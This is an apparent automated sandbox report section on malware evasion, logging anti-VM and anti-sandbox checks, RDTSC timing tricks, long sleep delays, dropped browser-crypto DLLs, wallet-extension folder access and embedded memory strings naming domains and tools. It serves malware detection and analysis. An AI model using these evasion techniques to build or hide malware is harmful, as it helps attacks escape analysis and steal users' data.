            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: build2.exe PID: 728, type: MEMORYSTR
            Checks if the current machine is a virtual machine (disk enumeration)
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\Desktop\6uVlPQSJ4e.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Source: C:\Users\user\AppData\Roaming\gtdiratKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeSystem information queried: FirmwareTableInformation
            Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
            Source: A0B.exe, 00000017.00000002.3117907227.00000000000F3000.00000020.00000001.01000000.0000000A.sdmpBinary or memory string: SBIEDLL.DLL
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: build2.exe, 00000029.00000002.3568020251.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeRDTSC instruction interceptor: First address: 5109D9 second address: 510A01 instructions: 0x00000000 rdtsc 0x00000002 sbb dx, bp 0x00000005 xor cl, FFFFFFA0h 0x00000008 dec dl 0x0000000a sbb dx, 7C4Eh 0x0000000f add cl, 00000054h 0x00000012 stc 0x00000013 movzx dx, dh 0x00000017 ror cl, 1 0x00000019 neg cl 0x0000001b btc ax, dx 0x0000001f xor bl, cl 0x00000021 rcr ah, cl 0x00000023 push edi 0x00000024 clc 0x00000025 shr ax, cl 0x00000028 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeRDTSC instruction interceptor: First address: 1C6B84 second address: 1C6B8B instructions: 0x00000000 rdtsc 0x00000002 not ebp 0x00000004 pop ebx 0x00000005 cwd 0x00000007 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\A0B.exeRDTSC instruction interceptor: First address: 41C111 second address: 41C11C instructions: 0x00000000 rdtsc 0x00000002 movzx dx, dh 0x00000006 movsx dx, dl 0x0000000a pop ebp 0x0000000b rdtsc
            Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 11_2_027D171C rdtsc 11_2_027D171C
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,GetTickCount,Heap32ListFirst,Heap32First,Heap32Next,GetTickCount,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,17_2_00481920
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,12_2_0040E670
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,17_2_0040E670
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeThread delayed: delay time: 700000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 434Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3208Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 766Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 365Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1457Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 787
            Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 719
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4820
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\msvcp140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\nss3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqlm[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\softokn3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dllJump to dropped file
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_12-45119
            Source: C:\Windows\explorer.exe TID: 4080Thread sleep time: -320800s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 3524Thread sleep time: -76600s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7000Thread sleep time: -36500s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 5792Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 4080Thread sleep time: -145700s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\DB15.exe TID: 6368Thread sleep time: -700000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\A0B.exe TID: 4996Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\A0B.exe TID: 4996Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1912Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4780Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\71C9.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,12_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeCode function: 12_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,12_2_0040FB98
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,17_2_0040F730
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,17_2_00410160
            Source: C:\Users\user\AppData\Local\ff34e5c5-5271-4a45-be37-87b03007a6ce\DB15.exeCode function: 17_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,17_2_0040FB98
            Source: C:\Users\user\AppData\Local\Temp\DB15.exeThread delayed: delay time: 700000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\c6ede164-9d46-4090-a93b-69cacd3fb0cf\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: explorer.exe, 00000002.00000000.2110113315.000000000962B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
            Source: 71C9.exe, 0000001D.00000002.3185463938.0000000003190000.00000040.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000003.3083456233.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: DnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMESSAGE-INTEGRITYMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5QueryWorkingSetExRESERVATION-TOKENReadProcessMemoryRegLoadMUIStringWRtlGetCurrentPebSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Windows 11[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8attr%d=%s cmd is nilcomplex128connectiondebug calldnsapi.dlldsefix.exedwmapi.dlle.keff.orgexecerrdotexitThreadexp masterfloat32nanfloat64nangetsockoptgoroutine http_proxyimage/avifimage/jpegimage/webpimpossibleindicationinvalid IPinvalidptrkeep-alivemSpanInUsemyhostnameno resultsnot a boolnot signednotifyListowner diedpowershellprl_cc.exeprofInsertres binderres masterresumptionrune <nil>runtime: gs.state = schedtracesemacquiresend stateset-cookiesetsockoptskipping: socks bindstackLarget.Kind == terminatedtext/plaintime.Date(time.Localtracefree(tracegc()
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: acceptactivechan<-closedcookiedirectdomainefenceempty exec: expectfamilygeoip6gopherhangupheaderinternip+netkilledlistenminutenetdnsnumberobjectoriginpopcntrdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying= flags= len=%d locks= m->g0= nmsys= pad1= pad2= s=nil
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: (MISSING)(unknown), newval=, oldval=, size = , tail = -07:00:00/api/cdn?/api/poll127.0.0.1244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticEVEN-PORTExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]_outboundatomicor8attributeb.ooze.ccbad indirbus errorchallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0dns,filesecdsa.netempty urlfiles,dnsfn.48.orgfodhelperfork/execfuncargs(gdi32.dllhchanLeafimage/gifimage/pnginittraceinterfaceinterruptinvalid nipv6-icmplocalhostmSpanDeadnew tokennil errorntdll.dllole32.dllomitemptyop_returnpanicwaitpatch.exepclmulqdqpreemptedprintableprofBlockprotocol proxy.exepsapi.dllquestionsreboot inrecover: reflect: rwxrwxrwxscavtracestackpoolsucceededtask %+v
            Source: explorer.exe, 00000022.00000003.3309134937.000000000C16B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: explorer.exe, 00000022.00000003.3248989137.000000000C148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: 71C9.exe, 0000001D.00000002.3181347032.0000000002D88000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: ameNewaPINGPOSTPathQEMUROOTH
            Source: 71C9.exe, 0000001D.00000002.3174783125.0000000000400000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
            Source: build2.exe, 00000029.00000003.3331774904.0000000000A4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: explorer.exe, 00000022.00000003.3248989137.000000000C148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000N%\
            Source: explorer.exe, 00000022.00000003.3193896166.00000000092EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: z5SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: DB15.exe, 00000011.00000002.4519701063.0000000000641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb
